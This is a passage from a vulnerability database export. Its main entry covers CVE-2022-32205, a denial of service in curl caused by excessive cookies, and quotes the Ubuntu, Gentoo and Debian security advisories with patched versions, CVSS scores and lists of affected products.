      },
      {
        "date": "2021-04-01T18:15:12.917000",
        "db": "NVD",
        "id": "CVE-2021-22890",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-22890",
        "ident": null
      },
      {
        "date": "2021-10-05T05:56:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-002808",
        "ident": null
      },
      {
        "date": "2021-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-975",
        "ident": null
      },
      {
        "date": "2023-06-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202103-1709",
        "ident": null
      },
      {
        "date": "2025-06-09T15:15:24.177000",
        "db": "NVD",
        "id": "CVE-2021-22890",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162037"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "curl\u00a0 Spoofing Authentication Vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002808"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1709"
      }
    ],
    "trust": 1.2
  }
}

VAR-202206-1962

Vulnerability from variot - Updated: 2025-05-07 20:20

A malicious server can serve excessive amounts of Set-Cookie: headers in a HTTP response to curl and curl < 7.84.0 stores all of them. A sufficiently large amount of (big) cookies make subsequent HTTP requests to this, or other servers to which the cookies match, create requests that become larger than the threshold that curl uses internally to avoid sending crazy large requests (1048576 bytes) and instead returns an error.This denial state might remain for as long as the same cookies are kept, match and haven't expired. Due to cookie matching rules, a server on foo.example.com can set cookies that also would match for bar.example.com, making it it possible for a "sister server" to effectively cause a denial of service for a sibling site on the same second level domain using this method. curl Exists in a vulnerability in resource allocation without restrictions or throttling.Service operation interruption (DoS) It may be in a state. ========================================================================== Ubuntu Security Notice USN-5495-1 June 27, 2022

curl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 22.04 LTS
Ubuntu 21.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in curl.

Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries

Details:

Harry Sintonen discovered that curl incorrectly handled certain cookies. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32205)

Harry Sintonen discovered that curl incorrectly handled certain HTTP compressions. An attacker could possibly use this issue to cause a denial of service. (CVE-2022-32206)

Harry Sintonen incorrectly handled certain file permissions. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207)

Harry Sintonen discovered that curl incorrectly handled certain FTP-KRB messages. An attacker could possibly use this to perform a machine-in-the-diddle attack. (CVE-2022-32208)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 22.04 LTS: curl 7.81.0-1ubuntu1.3 libcurl3-gnutls 7.81.0-1ubuntu1.3 libcurl3-nss 7.81.0-1ubuntu1.3 libcurl4 7.81.0-1ubuntu1.3

Ubuntu 21.10: curl 7.74.0-1.3ubuntu2.3 libcurl3-gnutls 7.74.0-1.3ubuntu2.3 libcurl3-nss 7.74.0-1.3ubuntu2.3 libcurl4 7.74.0-1.3ubuntu2.3

Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.12 libcurl3-gnutls 7.68.0-1ubuntu2.12 libcurl3-nss 7.68.0-1ubuntu2.12 libcurl4 7.68.0-1ubuntu2.12

Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.19 libcurl3-gnutls 7.58.0-2ubuntu3.19 libcurl3-nss 7.58.0-2ubuntu3.19 libcurl4 7.58.0-2ubuntu3.19

In general, a standard system update will make all the necessary changes.

References: https://ubuntu.com/security/notices/USN-5495-1 CVE-2022-32205, CVE-2022-32206, CVE-2022-32207, CVE-2022-32208

Package Information: https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.3 https://launchpad.net/ubuntu/+source/curl/7.74.0-1.3ubuntu2.3 https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.12 https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.19 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202212-01

                                       https://security.gentoo.org/

Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01

Synopsis

Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.

Background

A command line tool and library for transferring data with URLs.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/curl < 7.86.0 >= 7.86.0

Description

Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.

Impact

Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All curl users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"

References

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202212-01

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . These flaws may allow remote attackers to obtain sensitive information, leak authentication or cookie header data or facilitate a denial of service attack.

For the stable distribution (bullseye), these problems have been fixed in version 7.74.0-1.3+deb11u2.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmLoBaNfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeTf9A//VWkco2gxCMMe8JDcL9sLD0B5L8KGRxbPBYmpE1l2kCpiW9QGVwCN3q2K i8xo0jmRxSwSXDmAE17aTtGT66vU8vQSHewty031TcvWKBoAJpKRTbazfdOy/vDD waofTEaUClFt3NNiR3gigRU6OFV/9MWlUWwCJ/Wgd5osJTQCyWV/iHz3FJluc1Gp rXamYLnWGUJbIZgMFEo7TqIyb91P0PrX4hpnCcnhvY4ci5NWOj2qaoWGhgF+f9gz Uao91GTOnuTyoY3apKzifdO5dih9zJttnRKUgHkn9YCGxanljoPjHRYOavWdN6bE yIpT/Xw2dy05Fzydb73bDurQP+mkyWGZA+S8gxtbY7S7OylRS9iHSfyUpAVEM/Ab SPkGQl6vBKr7dmyHkdIlbViste6kcmhQQete9E3tM18MkyK0NbBiUj+pShNPC+SF REStal14ZE+DSwFKp5UA8izEh0G5RC5VUVhB/jtoxym2rvmIamk5YqCS1rupGP9R 1Y+Jm8CywBrKHl5EzAVUswC5xDAArWdXRvrgHCeElnkwuCwRC8AgRiYFFRulWKwt TV5qveehnzSc2z5IDc/tdiPWNJhJu/blNN8BauG8zmJV4ZhZP9EO1FCLE7DpqQ38 EPtUTMXaMQR1W15He51auBQwJgSiX1II+5jh6PeZTKBKnJgLYNA= =3E71 -----END PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202206-1962",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "curl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.71.0"
      },
      {
        "model": "scalance sc646-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "model": "clustered data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.6"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "macos",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "13.0"
      },
      {
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.0.0"
      },
      {
        "model": "scalance sc622-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "11.0"
      },
      {
        "model": "scalance sc642-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "model": "curl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.84.0"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "universal forwarder",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.0"
      },
      {
        "model": "scalance sc632-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "model": "scalance sc626-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "model": "scalance sc636-2c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.0"
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": "hci management node",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "scalance sc-622-2c",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
        "version": null
      },
      {
        "model": "element software",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "clustered data ontap",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "curl",
        "scope": null,
        "trust": 0.8,
        "vendor": "haxx",
        "version": null
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "macos",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30a2\u30c3\u30d7\u30eb",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32205"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "167607"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2022-32205",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2022-32205",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-424132",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "LOW",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2022-32205",
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "Low",
            "baseScore": 4.3,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2022-32205",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2022-32205",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2022-32205",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2022-32205",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202206-2562",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-424132",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-32205",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424132"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32205"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32205"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32205"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A malicious server can serve excessive amounts of `Set-Cookie:` headers in a HTTP response to curl and curl \u003c 7.84.0 stores all of them. A sufficiently large amount of (big) cookies make subsequent HTTP requests to this, or other servers to which the cookies match, create requests that become larger than the threshold that curl uses internally to avoid sending crazy large requests (1048576 bytes) and instead returns an error.This denial state might remain for as long as the same cookies are kept, match and haven\u0027t expired. Due to cookie matching rules, a server on `foo.example.com` can set cookies that also would match for `bar.example.com`, making it it possible for a \"sister server\" to effectively cause a denial of service for a sibling site on the same second level domain using this method. curl Exists in a vulnerability in resource allocation without restrictions or throttling.Service operation interruption (DoS) It may be in a state. ==========================================================================\nUbuntu Security Notice USN-5495-1\nJune 27, 2022\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.04 LTS\n- Ubuntu 21.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nHarry Sintonen discovered that curl incorrectly handled certain cookies. \nAn attacker could possibly use this issue to cause a denial of service. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32205)\n\nHarry Sintonen discovered that curl incorrectly handled certain HTTP compressions. \nAn attacker could possibly use this issue to cause a denial of service. \n(CVE-2022-32206)\n\nHarry Sintonen incorrectly handled certain file permissions. \nAn attacker could possibly use this issue to expose sensitive information. \nThis issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32207)\n\nHarry Sintonen discovered that curl incorrectly handled certain FTP-KRB messages. \nAn attacker could possibly use this to perform a machine-in-the-diddle attack. \n(CVE-2022-32208)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.04 LTS:\n  curl                            7.81.0-1ubuntu1.3\n  libcurl3-gnutls                 7.81.0-1ubuntu1.3\n  libcurl3-nss                    7.81.0-1ubuntu1.3\n  libcurl4                        7.81.0-1ubuntu1.3\n\nUbuntu 21.10:\n  curl                            7.74.0-1.3ubuntu2.3\n  libcurl3-gnutls                 7.74.0-1.3ubuntu2.3\n  libcurl3-nss                    7.74.0-1.3ubuntu2.3\n  libcurl4                        7.74.0-1.3ubuntu2.3\n\nUbuntu 20.04 LTS:\n  curl                            7.68.0-1ubuntu2.12\n  libcurl3-gnutls                 7.68.0-1ubuntu2.12\n  libcurl3-nss                    7.68.0-1ubuntu2.12\n  libcurl4                        7.68.0-1ubuntu2.12\n\nUbuntu 18.04 LTS:\n  curl                            7.58.0-2ubuntu3.19\n  libcurl3-gnutls                 7.58.0-2ubuntu3.19\n  libcurl3-nss                    7.58.0-2ubuntu3.19\n  libcurl4                        7.58.0-2ubuntu3.19\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-5495-1\n  CVE-2022-32205, CVE-2022-32206, CVE-2022-32207, CVE-2022-32208\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.3\n  https://launchpad.net/ubuntu/+source/curl/7.74.0-1.3ubuntu2.3\n  https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.12\n  https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.19\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n    Title: curl: Multiple Vulnerabilities\n     Date: December 19, 2022\n     Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n       ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/curl              \u003c 7.86.0                    \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n      https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n      https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n      https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n      https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n      https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n      https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n      https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. These flaws may allow remote attackers to obtain sensitive\ninformation, leak authentication or cookie header data or facilitate a\ndenial of service attack. \n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 7.74.0-1.3+deb11u2. \n\nWe recommend that you upgrade your curl packages. \n\nFor the detailed security status of curl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/curl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmLoBaNfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeTf9A//VWkco2gxCMMe8JDcL9sLD0B5L8KGRxbPBYmpE1l2kCpiW9QGVwCN3q2K\ni8xo0jmRxSwSXDmAE17aTtGT66vU8vQSHewty031TcvWKBoAJpKRTbazfdOy/vDD\nwaofTEaUClFt3NNiR3gigRU6OFV/9MWlUWwCJ/Wgd5osJTQCyWV/iHz3FJluc1Gp\nrXamYLnWGUJbIZgMFEo7TqIyb91P0PrX4hpnCcnhvY4ci5NWOj2qaoWGhgF+f9gz\nUao91GTOnuTyoY3apKzifdO5dih9zJttnRKUgHkn9YCGxanljoPjHRYOavWdN6bE\nyIpT/Xw2dy05Fzydb73bDurQP+mkyWGZA+S8gxtbY7S7OylRS9iHSfyUpAVEM/Ab\nSPkGQl6vBKr7dmyHkdIlbViste6kcmhQQete9E3tM18MkyK0NbBiUj+pShNPC+SF\nREStal14ZE+DSwFKp5UA8izEh0G5RC5VUVhB/jtoxym2rvmIamk5YqCS1rupGP9R\n1Y+Jm8CywBrKHl5EzAVUswC5xDAArWdXRvrgHCeElnkwuCwRC8AgRiYFFRulWKwt\nTV5qveehnzSc2z5IDc/tdiPWNJhJu/blNN8BauG8zmJV4ZhZP9EO1FCLE7DpqQ38\nEPtUTMXaMQR1W15He51auBQwJgSiX1II+5jh6PeZTKBKnJgLYNA=\n=3E71\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-32205"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "db": "VULHUB",
        "id": "VHN-424132"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32205"
      },
      {
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "169318"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-32205",
        "trust": 3.7
      },
      {
        "db": "HACKERONE",
        "id": "1569946",
        "trust": 2.6
      },
      {
        "db": "SIEMENS",
        "id": "SSA-333517",
        "trust": 1.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-349-18",
        "trust": 0.9
      },
      {
        "db": "PACKETSTORM",
        "id": "167607",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU91561630",
        "trust": 0.8
